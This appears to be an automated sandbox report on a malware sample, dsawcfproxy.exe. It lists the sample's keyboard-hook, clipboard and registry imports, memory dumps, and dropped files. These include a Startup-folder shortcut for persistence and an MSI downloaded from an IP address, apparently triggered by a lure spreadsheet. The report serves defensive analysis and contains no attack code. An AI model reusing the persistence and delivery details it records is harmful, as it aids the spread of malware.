GetWindowTextW	-	0x004AE570	0x000D2030	0x000D0630	0x000001A3
mouse_event	-	0x004AE574	0x000D2034	0x000D0634	0x00000331
WindowFromPoint	-	0x004AE578	0x000D2038	0x000D0638	0x0000032C
GetSystemMetrics	-	0x004AE57C	0x000D203C	0x000D063C	0x0000017E
keybd_event	-	0x004AE580	0x000D2040	0x000D0640	0x00000330
SetKeyboardState	-	0x004AE584	0x000D2044	0x000D0644	0x00000296
GetKeyboardState	-	0x004AE588	0x000D2048	0x000D0648	0x00000142
GetCursorPos	-	0x004AE58C	0x000D204C	0x000D064C	0x00000120
GetAsyncKeyState	-	0x004AE590	0x000D2050	0x000D0650	0x00000107
AttachThreadInput	-	0x004AE594	0x000D2054	0x000D0654	0x0000000C
SendInput	-	0x004AE598	0x000D2058	0x000D0658	0x00000276
RegisterHotKey	-	0x004AE59C	0x000D205C	0x000D065C	0x00000256
SendMessageTimeoutW	-	0x004AE5A0	0x000D2060	0x000D0660	0x0000027B
UnhookWindowsHookEx	-	0x004AE5A4	0x000D2064	0x000D0664	0x00000300
SetWindowsHookExW	-	0x004AE5A8	0x000D2068	0x000D0668	0x000002CF
PostThreadMessageW	-	0x004AE5AC	0x000D206C	0x000D066C	0x00000239
IsCharAlphaNumericW	-	0x004AE5B0	0x000D2070	0x000D0670	0x000001C3
IsCharUpperW	-	0x004AE5B4	0x000D2074	0x000D0674	0x000001C8
IsCharLowerW	-	0x004AE5B8	0x000D2078	0x000D0678	0x000001C6
ToUnicodeEx	-	0x004AE5BC	0x000D207C	0x000D067C	0x000002F4
GetKeyboardLayout	-	0x004AE5C0	0x000D2080	0x000D0680	0x0000013E
CallNextHookEx	-	0x004AE5C4	0x000D2084	0x000D0684	0x0000001C
CharLowerW	-	0x004AE5C8	0x000D2088	0x000D0688	0x0000002E
ReleaseDC	-	0x004AE5CC	0x000D208C	0x000D068C	0x00000265
GetDC	-	0x004AE5D0	0x000D2090	0x000D0690	0x00000121
MessageBoxW	-	0x004AE5D4	0x000D2094	0x000D0694	0x00000215
OpenClipboard	-	0x004AE5D8	0x000D2098	0x000D0698	0x00000226
GetClipboardData	-	0x004AE5DC	0x000D209C	0x000D069C	0x00000116
GetClipboardFormatNameW	-	0x004AE5E0	0x000D20A0	0x000D06A0	0x00000118
CloseClipboard	-	0x004AE5E4	0x000D20A4	0x000D06A4	0x00000049
SetClipboardData	-	0x004AE5E8	0x000D20A8	0x000D06A8	0x00000286
EmptyClipboard	-	0x004AE5EC	0x000D20AC	0x000D06AC	0x000000D5
PostMessageW	-	0x004AE5F0	0x000D20B0	0x000D06B0	0x00000236
FindWindowW	-	0x004AE5F4	0x000D20B4	0x000D06B4	0x000000FA
EndDialog	-	0x004AE5F8	0x000D20B8	0x000D06B8	0x000000DA
IsWindow	-	0x004AE5FC	0x000D20BC	0x000D06BC	0x000001DB
DispatchMessageW	-	0x004AE600	0x000D20C0	0x000D06C0	0x000000AF
TranslateMessage	-	0x004AE604	0x000D20C4	0x000D06C4	0x000002FC
ShowWindow	-	0x004AE608	0x000D20C8	0x000D06C8	0x000002DF
CountClipboardFormats	-	0x004AE60C	0x000D20CC	0x000D06CC	0x00000056
ClientToScreen	-	0x004AE610	0x000D20D0	0x000D06D0	0x00000047
EnumChildWindows	-	0x004AE614	0x000D20D4	0x000D06D4	0x000000DF
MoveWindow	-	0x004AE618	0x000D20D8	0x000D06D8	0x0000021B
GetWindowRect	-	0x004AE61C	0x000D20DC	0x000D06DC	0x0000019C
GetMonitorInfoW	-	0x004AE620	0x000D20E0	0x000D06E0	0x0000015F
MonitorFromPoint	-	0x004AE624	0x000D20E4	0x000D06E4	0x00000218
GetClientRect	-	0x004AE628	0x000D20E8	0x000D06E8	0x00000114
SystemParametersInfoW	-	0x004AE62C	0x000D20EC	0x000D06EC	0x000002EC
AdjustWindowRectEx	-	0x004AE630	0x000D20F0	0x000D06F0	0x00000003
DrawTextW	-	0x004AE634	0x000D20F4	0x000D06F4	0x000000D0
SetRect	-	0x004AE638	0x000D20F8	0x000D06F8	0x000002AE
GetIconInfo	-	0x004AE63C	0x000D20FC	0x000D06FC	0x00000133
CreateIconIndirect	-	0x004AE640	0x000D2100	0x000D0700	0x00000067
SetWindowTextW	-	0x004AE644	0x000D2104	0x000D0704	0x000002CB
SetWindowLongW	-	0x004AE648	0x000D2108	0x000D0708	0x000002C4
ScreenToClient	-	0x004AE64C	0x000D210C	0x000D070C	0x0000026D
IsDialogMessageW	-	0x004AE650	0x000D2110	0x000D0710	0x000001CD
SendMessageW	-	0x004AE654	0x000D2114	0x000D0714	0x0000027C
IsWindowEnabled	-	0x004AE658	0x000D2118	0x000D0718	0x000001DC
GetWindowLongW	-	0x004AE65C	0x000D211C	0x000D071C	0x00000196
GetKeyState	-	0x004AE660	0x000D2120	0x000D0720	0x0000013D
TranslateAcceleratorW	-	0x004AE664	0x000D2124	0x000D0724	0x000002FA
KillTimer	-	0x004AE668	0x000D2128	0x000D0728	0x000001E3
PeekMessageW	-	0x004AE66C	0x000D212C	0x000D072C	0x00000233
GetFocus	-	0x004AE670	0x000D2130	0x000D0730	0x0000012C
GetClassNameW	-	0x004AE674	0x000D2134	0x000D0734	0x00000112
GetWindowThreadProcessId	-	0x004AE678	0x000D2138	0x000D0738	0x000001A4
GetForegroundWindow	-	0x004AE67C	0x000D213C	0x000D073C	0x0000012D
GetMessageW	-	0x004AE680	0x000D2140	0x000D0740	0x0000015D
SetTimer	-	0x004AE684	0x000D2144	0x000D0744	0x000002BB
GetParent	-	0x004AE688	0x000D2148	0x000D0748	0x00000164
GetDlgCtrlID	-	0x004AE68C	0x000D214C	0x000D074C	0x00000126
CharUpperW	-	0x004AE690	0x000D2150	0x000D0750	0x0000003C
IsClipboardFormatAvailable	-	0x004AE694	0x000D2154	0x000D0754	0x000001CA
BlockInput	-	0x004AE698	0x000D2158	0x000D0758	0x0000000F
ChangeClipboardChain	-	0x004AE69C	0x000D215C	0x000D075C	0x00000022
CheckMenuItem	-	0x004AE6A0	0x000D2160	0x000D0760	0x0000003F
UnregisterHotKey	-	0x004AE6A4	0x000D2164	0x000D0764	0x00000308

GDI32.dll (34)

API Name	Ordinal	IAT Address	Thunk RVA	Thunk Offset	Hint
GdiFlush	-	0x004AE080	0x000D1B40	0x000D0140	0x00000175
CreateDIBSection	-	0x004AE084	0x000D1B44	0x000D0144	0x00000035
EnumFontFamiliesExW	-	0x004AE088	0x000D1B48	0x000D0148	0x00000125
SetBrushOrgEx	-	0x004AE08C	0x000D1B4C	0x000D014C	0x00000282
SetBkColor	-	0x004AE090	0x000D1B50	0x000D0150	0x0000027E
GetPixel	-	0x004AE094	0x000D1B54	0x000D0154	0x00000204
BitBlt	-	0x004AE098	0x000D1B58	0x000D0158	0x00000013
CreatePatternBrush	-	0x004AE09C	0x000D1B5C	0x000D015C	0x0000004A
SetBkMode	-	0x004AE0A0	0x000D1B60	0x000D0160	0x0000027F
GetCharABCWidthsW	-	0x004AE0A4	0x000D1B64	0x000D0164	0x000001B5
GetClipBox	-	0x004AE0A8	0x000D1B68	0x000D0168	0x000001C0
FillRgn	-	0x004AE0AC	0x000D1B6C	0x000D016C	0x00000142
GetClipRgn	-	0x004AE0B0	0x000D1B70	0x000D0170	0x000001C1
ExcludeClipRect	-	0x004AE0B4	0x000D1B74	0x000D0174	0x00000131
GetDeviceCaps	-	0x004AE0B8	0x000D1B78	0x000D0178	0x000001CB
DeleteObject	-	0x004AE0BC	0x000D1B7C	0x000D017C	0x000000E6
CreateFontW	-	0x004AE0C0	0x000D1B80	0x000D0180	0x00000041
CreateSolidBrush	-	0x004AE0C4	0x000D1B84	0x000D0184	0x00000054
CreateCompatibleBitmap	-	0x004AE0C8	0x000D1B88	0x000D0188	0x0000002F
GetSystemPaletteEntries	-	0x004AE0CC	0x000D1B8C	0x000D018C	0x00000212
GetDIBits	-	0x004AE0D0	0x000D1B90	0x000D0190	0x000001CA
CreateCompatibleDC	-	0x004AE0D4	0x000D1B94	0x000D0194	0x00000030
CreatePolygonRgn	-	0x004AE0D8	0x000D1B98	0x000D0198	0x0000004E
CreateRectRgn	-	0x004AE0DC	0x000D1B9C	0x000D019C	0x0000004F
CreateRoundRectRgn	-	0x004AE0E0	0x000D1BA0	0x000D01A0	0x00000051
CreateEllipticRgn	-	0x004AE0E4	0x000D1BA4	0x000D01A4	0x00000038
DeleteDC	-	0x004AE0E8	0x000D1BA8	0x000D01A8	0x000000E3
GetObjectW	-	0x004AE0EC	0x000D1BAC	0x000D01AC	0x000001FD
GetTextMetricsW	-	0x004AE0F0	0x000D1BB0	0x000D01B0	0x00000226
GetTextFaceW	-	0x004AE0F4	0x000D1BB4	0x000D01B4	0x00000224
SelectObject	-	0x004AE0F8	0x000D1BB8	0x000D01B8	0x00000277
GetStockObject	-	0x004AE0FC	0x000D1BBC	0x000D01BC	0x0000020D
CreateDCW	-	0x004AE100	0x000D1BC0	0x000D01C0	0x00000032
SetTextColor	-	0x004AE104	0x000D1BC4	0x000D01C4	0x000002A6

COMDLG32.dll (3)

API Name	Ordinal	IAT Address	Thunk RVA	Thunk Offset	Hint
CommDlgExtendedError	-	0x004AE070	0x000D1B30	0x000D0130	0x00000004
GetOpenFileNameW	-	0x004AE074	0x000D1B34	0x000D0134	0x0000000C
GetSaveFileNameW	-	0x004AE078	0x000D1B38	0x000D0138	0x0000000E

ADVAPI32.dll (19)

API Name	Ordinal	IAT Address	Thunk RVA	Thunk Offset	Hint
GetUserNameW	-	0x004AE000	0x000D1AC0	0x000D00C0	0x00000165
LockServiceDatabase	-	0x004AE004	0x000D1AC4	0x000D00C4	0x00000188
OpenSCManagerW	-	0x004AE008	0x000D1AC8	0x000D00C8	0x000001F9
RegEnumKeyExW	-	0x004AE00C	0x000D1ACC	0x000D00CC	0x0000024F
RegEnumValueW	-	0x004AE010	0x000D1AD0	0x000D00D0	0x00000252
RegQueryInfoKeyW	-	0x004AE014	0x000D1AD4	0x000D00D4	0x00000268
RegOpenKeyExW	-	0x004AE018	0x000D1AD8	0x000D00D8	0x00000261
RegCloseKey	-	0x004AE01C	0x000D1ADC	0x000D00DC	0x00000230
RegDeleteValueW	-	0x004AE020	0x000D1AE0	0x000D00E0	0x00000248
RegDeleteKeyW	-	0x004AE024	0x000D1AE4	0x000D00E4	0x00000244
RegSetValueExW	-	0x004AE028	0x000D1AE8	0x000D00E8	0x0000027E
RegCreateKeyExW	-	0x004AE02C	0x000D1AEC	0x000D00EC	0x00000239
RegQueryValueExW	-	0x004AE030	0x000D1AF0	0x000D00F0	0x0000026E
AdjustTokenPrivileges	-	0x004AE034	0x000D1AF4	0x000D00F4	0x0000001F
LookupPrivilegeValueW	-	0x004AE038	0x000D1AF8	0x000D00F8	0x00000197
OpenProcessToken	-	0x004AE03C	0x000D1AFC	0x000D00FC	0x000001F7
CloseServiceHandle	-	0x004AE040	0x000D1B00	0x000D0100	0x00000057
RegConnectRegistryW	-	0x004AE044	0x000D1B04	0x000D0104	0x00000234
UnlockServiceDatabase	-	0x004AE048	0x000D1B08	0x000D0108	0x00000300

SHELL32.dll (13)

API Name	Ordinal	IAT Address	Thunk RVA	Thunk Offset	Hint
DragQueryPoint	-	0x004AE3C8	0x000D1E88	0x000D0488	0x00000020
SHEmptyRecycleBinW	-	0x004AE3CC	0x000D1E8C	0x000D048C	0x000000A5
SHFileOperationW	-	0x004AE3D0	0x000D1E90	0x000D0490	0x000000AC
SHGetPathFromIDListW	-	0x004AE3D4	0x000D1E94	0x000D0494	0x000000D7
SHBrowseForFolderW	-	0x004AE3D8	0x000D1E98	0x000D0498	0x0000007B
SHGetDesktopFolder	-	0x004AE3DC	0x000D1E9C	0x000D049C	0x000000B6
SHGetMalloc	-	0x004AE3E0	0x000D1EA0	0x000D04A0	0x000000CF
SHGetFolderPathW	-	0x004AE3E4	0x000D1EA4	0x000D04A4	0x000000C3
ShellExecuteExW	-	0x004AE3E8	0x000D1EA8	0x000D04A8	0x00000121
Shell_NotifyIconW	-	0x004AE3EC	0x000D1EAC	0x000D04AC	0x0000012E
DragFinish	-	0x004AE3F0	0x000D1EB0	0x000D04B0	0x0000001B
DragQueryFileW	-	0x004AE3F4	0x000D1EB4	0x000D04B4	0x0000001F
ExtractIconW	-	0x004AE3F8	0x000D1EB8	0x000D04B8	0x0000002B

ole32.dll (10)

API Name	Ordinal	IAT Address	Thunk RVA	Thunk Offset	Hint
OleInitialize	-	0x004AE764	0x000D2224	0x000D0824	0x00000132
OleUninitialize	-	0x004AE768	0x000D2228	0x000D0828	0x00000149
CoCreateInstance	-	0x004AE76C	0x000D222C	0x000D082C	0x00000010
CoInitialize	-	0x004AE770	0x000D2230	0x000D0830	0x0000003E
CoUninitialize	-	0x004AE774	0x000D2234	0x000D0834	0x0000006C
CLSIDFromString	-	0x004AE778	0x000D2238	0x000D0838	0x00000008
CLSIDFromProgID	-	0x004AE77C	0x000D223C	0x000D083C	0x00000006
CoGetObject	-	0x004AE780	0x000D2240	0x000D0840	0x00000035
StringFromGUID2	-	0x004AE784	0x000D2244	0x000D0844	0x00000179
CreateStreamOnHGlobal	-	0x004AE788	0x000D2248	0x000D0848	0x00000086

OLEAUT32.dll (20)

API Name	Ordinal	IAT Address	Thunk RVA	Thunk Offset	Hint
OleLoadPicture	0x000001A2	0x004AE368	0x000D1E28	0x000D0428	-
SafeArrayUnaccessData	0x00000018	0x004AE36C	0x000D1E2C	0x000D042C	-
SafeArrayGetElemsize	0x00000012	0x004AE370	0x000D1E30	0x000D0430	-
SafeArrayAccessData	0x00000017	0x004AE374	0x000D1E34	0x000D0434	-
SafeArrayUnlock	0x00000016	0x004AE378	0x000D1E38	0x000D0438	-
SafeArrayPtrOfIndex	0x00000094	0x004AE37C	0x000D1E3C	0x000D043C	-
SafeArrayLock	0x00000015	0x004AE380	0x000D1E40	0x000D0440	-
SafeArrayDestroy	0x00000010	0x004AE384	0x000D1E44	0x000D0444	-
GetActiveObject	0x00000023	0x004AE388	0x000D1E48	0x000D0448	-
SysStringLen	0x00000007	0x004AE38C	0x000D1E4C	0x000D044C	-
SysFreeString	0x00000006	0x004AE390	0x000D1E50	0x000D0450	-
SafeArrayCreate	0x0000000F	0x004AE394	0x000D1E54	0x000D0454	-
VariantClear	0x00000009	0x004AE398	0x000D1E58	0x000D0458	-
VariantChangeType	0x0000000C	0x004AE39C	0x000D1E5C	0x000D045C	-
SysAllocString	0x00000002	0x004AE3A0	0x000D1E60	0x000D0460	-
SafeArrayCopy	0x0000001B	0x004AE3A4	0x000D1E64	0x000D0464	-
VariantCopyInd	0x0000000B	0x004AE3A8	0x000D1E68	0x000D0468	-
SafeArrayGetUBound	0x00000013	0x004AE3AC	0x000D1E6C	0x000D046C	-
SafeArrayGetLBound	0x00000014	0x004AE3B0	0x000D1E70	0x000D0470	-
SafeArrayGetDim	0x00000011	0x004AE3B4	0x000D1E74	0x000D0474	-

Memory Dumps (15)

Name	Process ID	Start VA	End VA	Dump Reason	Bitness	Entry Point	Actions
dsawcfproxy.exe	3	0x00400000	0x004E8FFF	Relevant Image	32-bit	0x0049F160	... Actions Go to Process Download Dump
buffer	3	0x008B2000	0x008EFFFF	First Network Behavior	32-bit	-	... Actions Go to Process Download Dump
buffer	3	0x002311F8	0x002319F7	First Network Behavior	32-bit	-	... Actions Go to Process Download Dump
buffer	3	0x00231AE0	0x00231C6F	First Network Behavior	32-bit	-	... Actions Go to Process Download Dump
buffer	3	0x00232B90	0x00232C0F	First Network Behavior	32-bit	-	... Actions Go to Process Download Dump
buffer	3	0x00232C18	0x00232E37	First Network Behavior	32-bit	-	... Actions Go to Process Download Dump
buffer	3	0x00232E40	0x0023343F	First Network Behavior	32-bit	-	... Actions Go to Process Download Dump
buffer	3	0x00233448	0x00235567	First Network Behavior	32-bit	-	... Actions Go to Process Download Dump
buffer	3	0x00235570	0x002363DF	First Network Behavior	32-bit	-	... Actions Go to Process Download Dump
buffer	3	0x002363E8	0x0023E3E7	First Network Behavior	32-bit	-	... Actions Go to Process Download Dump
buffer	3	0x02160048	0x02170047	First Network Behavior	32-bit	-	... Actions Go to Process Download Dump
buffer	3	0x02170050	0x02170FEF	First Network Behavior	32-bit	-	... Actions Go to Process Download Dump
buffer	3	0x02170FF8	0x02171187	First Network Behavior	32-bit	-	... Actions Go to Process Download Dump
dsawcfproxy.exe	3	0x00400000	0x004E8FFF	First Network Behavior	32-bit	0x0049C9AF	... Actions Go to Process Download Dump
dsawcfproxy.exe	3	0x00400000	0x004E8FFF	Final Dump	32-bit	-	... Actions Go to Process Download Dump

C:\Windows\Installer\16eda53.ipi

Dropped File

OLE Compound

MIME Type	application/CDFV2
File Size	20.00 KB
MD5	8d59c1a478b44f7f3436646404f7e476
SHA1	533aae9fa360feafadf8a67a7d9cb4848d476bc9
SHA256	f053da3b0bdd4adb7aa30f49a9c386865ecf3da75dd1e964c5729a0d6e110d29
SSDeep	48:BGnSEElm8luTMwvoS5GnqcCuSidPzSIlilQp4:BGSEEAQwgLCWJV4
ImpHash	-

CFB Streams (17)

Name	ID	Size	Actions
Root\䕙䇲䆸㲷䠧	1	76 Bytes	... Actions Download File
Root\䕙䇲䆸㷷䐤䠨	2	32 Bytes	... Actions Download File
Root\䒕䒪㾱䈶䠵	3	18 Bytes	... Actions Download File
Root\䈜䈯䗦䒬䖱	4	40 Bytes	... Actions Download File
Root\䒏䇯䕨䠶	5	114 Bytes	... Actions Download File
Root\䕙䓲䕨䌷䖨	6	650 Bytes	... Actions Download File
Root\䌝䈰䗜䐤㵳䚲	7	20 Bytes	... Actions Download File
Root\䌝䈰䗜䐤㱳䊬䠫	8	16 Bytes	... Actions Download File
Root\䄍䄷䄥䈶䄙䋷	9	64 Bytes	... Actions Download File
Root\䌍䎶䕙䐲䗳	10	0 Bytes	-
Root\䌍䎶䈜䌵䏤	11	0 Bytes	-
Root\䜜䗶䐨䈛䗶䕲㼨䔨䈸䆱䠨	12	2 Bytes	... Actions Download File
Root\䉊䈷㻵䅨䒲䠷	13	0 Bytes	-
Root\䕝䑤䄶䗦䒬㷱䐤䠨	14	122 Bytes	... Actions Download File
Root\䕝䑤䄶䗦䒬㫱䊨䑬䌝䈰䒕䠺	15	20 Bytes	... Actions Download File
Root\䕝䑤䄶䗦䒬㫱䊨䑬䌝䈰䌑䋪	16	16 Bytes	... Actions Download File
Root\䘖䗯㹬䆤䄮䈪䕝䑤䄶䗦䒬䠱	17	2 Bytes	... Actions Download File

C:\Windows\Installer\16eda53.ipi

Dropped File

OLE Compound

MIME Type	application/CDFV2
File Size	20.00 KB
MD5	a542c58f5503deb6f55bb9081bef7563
SHA1	5ee2735f037a532fb745ebf7ad493ed6b42c66bf
SHA256	7e4117cf237805c09ff03fc4e6a96a70c58765f4d9c1ecbf92c1ac0d1036534e
SSDeep	48:V0RcDHJludMwvoS5GnqcCuSidPzSIlilQp4:V8P6wgLCWJV4
ImpHash	-

CFB Streams (17)

Name	ID	Size	Actions
Root\䕙䇲䆸㲷䠧	1	0 Bytes	-
Root\䕙䇲䆸㷷䐤䠨	2	0 Bytes	-
Root\䒕䒪㾱䈶䠵	3	18 Bytes	... Actions Download File
Root\䈜䈯䗦䒬䖱	4	0 Bytes	-
Root\䒏䇯䕨䠶	5	0 Bytes	-
Root\䕙䓲䕨䌷䖨	6	0 Bytes	-
Root\䌝䈰䗜䐤㵳䚲	7	0 Bytes	-
Root\䌝䈰䗜䐤㱳䊬䠫	8	0 Bytes	-
Root\䄍䄷䄥䈶䄙䋷	9	0 Bytes	-
Root\䌍䎶䕙䐲䗳	10	0 Bytes	-
Root\䌍䎶䈜䌵䏤	11	0 Bytes	-
Root\䜜䗶䐨䈛䗶䕲㼨䔨䈸䆱䠨	12	2 Bytes	... Actions Download File
Root\䉊䈷㻵䅨䒲䠷	13	0 Bytes	-
Root\䕝䑤䄶䗦䒬㷱䐤䠨	14	122 Bytes	... Actions Download File
Root\䕝䑤䄶䗦䒬㫱䊨䑬䌝䈰䒕䠺	15	20 Bytes	... Actions Download File
Root\䕝䑤䄶䗦䒬㫱䊨䑬䌝䈰䌑䋪	16	16 Bytes	... Actions Download File
Root\䘖䗯㹬䆤䄮䈪䕝䑤䄶䗦䒬䠱	17	2 Bytes	... Actions Download File

c:\users\keecfmwgj\appdata\local\temp\~dfdf78cdc09372e4a9.tmp

Dropped File

Stream

MIME Type	application/octet-stream
File Size	68.00 KB
MD5	ff1892d34524721376272d0b01231ad0
SHA1	a38dfd05822f5fffb3f59bc6d0a718b92b8ec399
SHA256	f9aa645b2a0abb03833094fe66ea6af5fd75e07e6a2ea992843bfcc2ccab1a7f
SSDeep	24:+4O+lQyil3ZipVsZipV7V8nZgNlG1CsGgSi+It3rVZkM0+IBDvY:+4rQyilpS4S5GnqcCuSidPV0RM
ImpHash	-

C:\Windows\Installer\MSIB37E.tmp

Dropped File

Stream

MIME Type	application/octet-stream
File Size	50.52 KB
MD5	cc04e66518a449541aa8b33cfda3341b
SHA1	4d34cabf2a976b1e5cecbf6de7bbfaff53fbc3bf
SHA256	2a9567c01f51afffe7b34ded6601112ce59261736b6eae10ba72260aee673a0d
SSDeep	384:5R8YUsO8LkFN4OIryI8J3Y2JB36E45nHQd:5N8HIryIc3YaB36E45nHQd
ImpHash	-

C:\Users\kEecfMwgj\AppData\Roaming\Microsoft\Installer\{49FBE0A1-9D8A-4E7D-B2BE-75D34CFA641C}\IconFile1__F4EEAA8E_E978_4D54_B160_638656A127CE_.ico

Dropped File

Image

MIME Type	image/vnd.microsoft.icon
File Size	48.12 KB
MD5	6057dbeb81b98203080d3927b487ea04
SHA1	17eb1a2ceef5241fba4be211a0c27708679f01d0
SHA256	7d86c0663024b5191f495857a6196b89857ebcf4e3d8fc4df17ee57590af03e0
SSDeep	192:3GfYUsO8CcC7FN4OIrFkVI8yY3rUs7VJB34jE45nHQwT:EYUsO8LkFN4OIryI8J3Y2JB36E45nHQ
ImpHash	-

File Reputation Information

Verdict

Clean

c:\users\keecfmwgj\appdata\local\temp\cookies\index.dat

Dropped File

Stream

Also Known As	c:\users\keecfmwgj\appdata\local\temp\history\history.ie5\index.dat (Dropped File)
MIME Type	application/octet-stream
File Size	16.00 KB
MD5	d7a950fefd60dbaa01df2d85fefb3862
SHA1	15740b197555ba8e162c37a60ba655151e3bebae
SHA256	75d0b1743f61b76a35b1fedd32378837805de58d79fa950cb6e8164bfa72073a
SSDeep	3:qRFiJ2totWIlXllll:qjyx
ImpHash	-

File Reputation Information

Verdict

Clean

c:\users\keecfmwgj\appdata\local\temp\temporary internet files\content.ie5\index.dat

Dropped File

Stream

MIME Type	application/octet-stream
File Size	16.00 KB
MD5	e7268dffaad766cc2f27781b5f0b8d6d
SHA1	6950cc6722088b20ec0b6223a376df3e2aa83b53
SHA256	5c804d35011a2c0b6dcd87bf56e895f25f759d6c2e6118de236cfa13246a3054
SSDeep	3:qRFiJ2totWIlXllll5llAj9WcrllibirwtXyrt:qjyxaj9WOi8QCrt
ImpHash	-

c:\users\keecfmwgj\appdata\local\temp\temporary internet files\content.ie5\index.dat

Dropped File

Stream

MIME Type	application/octet-stream
File Size	16.00 KB
MD5	bdeb6432dc7527072949be8c9433de29
SHA1	d23ec44b417f71a44eaad405a4fa342dff1ba6e6
SHA256	6f56cfc9a174ed7a23e31e3abf3e20cf776d1f9fb2b2bd5bf22c2d1a77d30754
SSDeep	3:qRFiJ2totWIlXllMl5llAj9WcrllibirwtXyrt:qjyxksj9WOi8QCrt
ImpHash	-

C:\Config.Msi\16eda54.rbs

Dropped File

Stream

MIME Type	application/octet-stream
File Size	2.64 KB
MD5	8f48c4c039606346a2d1d0a883fc0eec
SHA1	ba2bc01b5b2f4f7402872746a3d8a26448f86fde
SHA256	403b8a254729aecaa863c62414103a66ca029752af91df04c54b09bbfaf0cf45
SSDeep	24:/OgMb6zDkXCxlxI56NGI0cV08m0q0l0p0llpUUZFeV5snwZrwGw0dnwquVMCwGws:Gf6zXv/37WYnwZFu+8Pluzu1dD8SK1c
ImpHash	-

C:\Users\kEecfMwgj\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DSAWcfProxy.lnk

Dropped File

Shortcut

MIME Type	application/x-ms-shortcut
File Size	1.71 KB
MD5	cdfdee046360c023302fd12692717893
SHA1	cb742e5a7e59bb332354d765f566767b837eaad4
SHA256	96c4d15be9b52b59c8c981ab531e83c0d6f79f7c71d9e05db5d2ce52645795df
SSDeep	24:8FOEK6nsypKUCnzkD4O+/dRnl1du1zO5D4O+/dRKh:8IwN0UCngD4Fn/du1SD4FKh
ImpHash	-

c:\users\keecfmwgj\appdata\local\temp\~dfbf2e38c5020521a2.tmp

Dropped File

Stream

MIME Type	application/octet-stream
File Size	512 Bytes
MD5	bf619eac0cdf3f68d496ea9344137e8b
SHA1	5c3eb80066420002bc3dcc7ca4ab6efad7ed4ae5
SHA256	076a27c79e5ace2a3d47f9dd2e83e4ff6ea8872b3c2218f66c92b89b55f36560
SSDeep	3::
ImpHash	-

File Reputation Information

Verdict

Clean

C:\Persistent\DSAWcfProxy.ahk

Dropped File

Text

MIME Type	text/plain
File Size	350 Bytes
MD5	a9d79eda4c6e95057c6cb9f08ba72285
SHA1	464c825595ae5d9b48770c6304f370572563da5e
SHA256	db81436f20eae0fc0281746951580fa71cad691d9a15166fd0953e10e36e431f
SSDeep	6:bkWXWBbPIwAufyWB5MZ/VSVKGBJzV/b5Z5fHUUswx4acx4uDlt14kc4E:bpW1ImN/MLSoGTR/lbcdwx4z4upt14kQ
ImpHash	-

c:\users\keecfmwgj\appdata\local\temp\history\history.ie5\desktop.ini

Dropped File

Unknown

MIME Type	application/x-wine-extension-ini
File Size	145 Bytes
MD5	ba96961f5e22882527919e19daea510f
SHA1	e10e8bebbd0573e3a1494ea3f21682f7490c427b
SHA256	dace5ad59099429d8aed4ee279f1263efb65d64456931398465a396cf0e79bd7
SSDeep	3:0NdQDjotjIAXNam+p28jqGiEI7fOLyovZeLhzUzYcB:0NwoyAXNxW28CEI7QyyZeNUzxB
ImpHash	-

File Reputation Information

Verdict

Clean

c:\users\keecfmwgj\appdata\local\temp\temporary internet files\content.ie5\21nqf6bu\desktop.ini

Dropped File

Unknown

Also Known As	c:\users\keecfmwgj\appdata\local\temp\temporary internet files\content.ie5\desktop.ini (Dropped File) c:\users\keecfmwgj\appdata\local\temp\temporary internet files\content.ie5\l9s4ejvz\desktop.ini (Dropped File) c:\users\keecfmwgj\appdata\local\temp\temporary internet files\content.ie5\m6c1x3yg\desktop.ini (Dropped File) c:\users\keecfmwgj\appdata\local\temp\temporary internet files\content.ie5\o37tgn32\desktop.ini (Dropped File)
MIME Type	application/x-wine-extension-ini
File Size	67 Bytes
MD5	4a3deb274bb5f0212c2419d3d8d08612
SHA1	fa52f823b821155cf0ec527d52ce9b1390ec615e
SHA256	2842973d15a14323e08598be1dfb87e54bf88a76be8c7bc94c56b079446edf38
SSDeep	3:0NdQDjo8hzUzYcB:0NwosUzxB
ImpHash	-

File Reputation Information

Verdict

Clean

C:\Config.Msi\MSIBA14.tmp

Dropped File

Empty

Also Known As	C:\Config.Msi\MSIC55B.tmp (Accessed File, Dropped File) C:\Persistent\DSAWcfProxy.exe~ (Accessed File, Dropped File)
MIME Type	application/x-empty
File Size	0 Bytes (not extracted)
MD5	d41d8cd98f00b204e9800998ecf8427e
SHA1	da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256	e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SSDeep	3::
ImpHash	-

C:\Windows\Installer\MSI989D.tmp

Downloaded File

MSI

Also Known As	69.10.48.240_build3.msi (Downloaded File)
MIME Type	application/x-msi
File Size	524.00 KB
MD5	435842fec424a8586e5855128884b319
SHA1	8ea14eaad1875aba13c4405c47191db6789090b1
SHA256	f7ba036b3b1a66fe80794cac08f49d6bac91688095f8eaf9857a1cbfebf5d864
SSDeep	12288:Wuh83qnFnYmuZMgZ1WxNOou0gGxPMH2tj:WQ83AYmngu1uqx+o
ImpHash	-

image1.png

Extracted File

Image

Parent File	C:\Users\kEecfMwgj\Desktop\Mobile_App_Project_Details.xls
MIME Type	image/png
File Size	55.16 KB
MD5	bcd27f5e300071f71d1d7ee7fc2e113d
SHA1	7d48b99f2f9ba62de02fc87c31e8cc74692884b7
SHA256	b829c4bfcc3825aec7e611ed59716b72e94d20ea161810f1af743a704b86a1fd
SSDeep	1536:DI4Deap+fjSCqP533pQp6mPw0MlKOhqVqr//:leCCShP536pdPOlFqVY3
ImpHash	-

Remarks (1/1)

There are no files for this filter

There are no files in this analysis

Classifications

Threat Names

Before

After

WHOIS Domain Information